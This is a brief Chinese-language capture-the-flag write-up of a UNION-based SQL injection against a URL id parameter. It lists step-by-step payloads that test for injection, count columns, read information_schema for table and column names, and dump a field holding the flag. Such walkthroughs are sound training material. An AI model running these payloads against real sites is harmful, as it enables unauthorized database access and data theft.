打开链接,会看到这样一个页面
只有一个简单的网格,没有其他东西,查看源代码,也没有发现什么有用的东西,于是就试一下在网址处进行注入。
在网址后面加一个单引号出错,加一句 and 1=1 正常,加 and 1=2 出错。则存在注入
按照注入步骤:
1. id = 1 order by 2 判断列数 // 当by后面为1时,页面不正常,为2时页面正常,所以列数为2
2. id = 1 union select 1,2 // 判断显示位数
3. id = 1 union select 1,database() // 得出数据库名称
4. id = 1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'my_db') // 得出表名
5. id = 1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'my_db' and table_name = thiskey) // 得出表中的字段名
6. id = 1 union select 1,(select k0y from thiskey) // 得出字段名中的信息
由此可得出 flag